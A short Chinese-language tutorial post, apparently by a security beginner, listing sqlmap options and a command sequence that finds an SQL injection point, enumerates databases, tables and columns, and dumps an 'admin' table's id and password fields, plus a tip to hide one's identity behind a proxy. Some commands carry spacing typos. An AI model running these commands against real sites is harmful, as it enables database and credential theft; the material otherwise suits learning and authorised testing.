获取目标

-d DIRECT 直接链接数据库

sqlmap -u --url=URL Target URL (e.g. “http://www.site.com/vuln.php?id=1”)

sqlmap -l 解析日志文件中的目标

sqlmap -x 从远程xml文件解析目标

sqlmap -m 扫描多个目标在同一个文本里面

sqlmap -r 从一个HTTP请求里面解析目标

sqlmap -g 使用谷歌搜索结果作为目标

拓展语句

–cookie=COOKIE 在需要登录的地方,需要登录后的cookie

–proxy="http://127.0.0.1:8087” 使用HTTP代理隐藏自己的身份,比如使用goagent等

–sql-query=QUERY 执行一个sql语句,不一定支持

–batch 默认执行Y,不用手动去选择

执行检测语句

检查注入点 sqlmap -u http://127.0.0.1/star_photo.php?artist_id=11

列数据库信息 sqlmap -u http://127.0.0.1/star_photo.php?artist_id=11 --dbs

指定库名列出所有表 sqlmap -u http://127.0.0.1/star_photo.php?artist_id=11 -Dvhost48330 --tables

指定库名表名列出所有字段 sqlmap -u http://127.0.0.1/star_photo.php?artist_id=11-Dvhost48330 -T admin --columns

指定库名表名字段dump出指定字段 sqlmap -u

http://127.0.0.1/star_photo.php?artist_id=11 -D vhost48330 -Tadmin -C ac,id,password --dump

我是罡罡同学,一位初入网安的小白。☜(ˆ▽ˆ)

(疯狂暗示 点赞 !关注!发 !!! 点赞 !关注!转发 !!!

* 您的支持是罡罡同学前进的最大动力!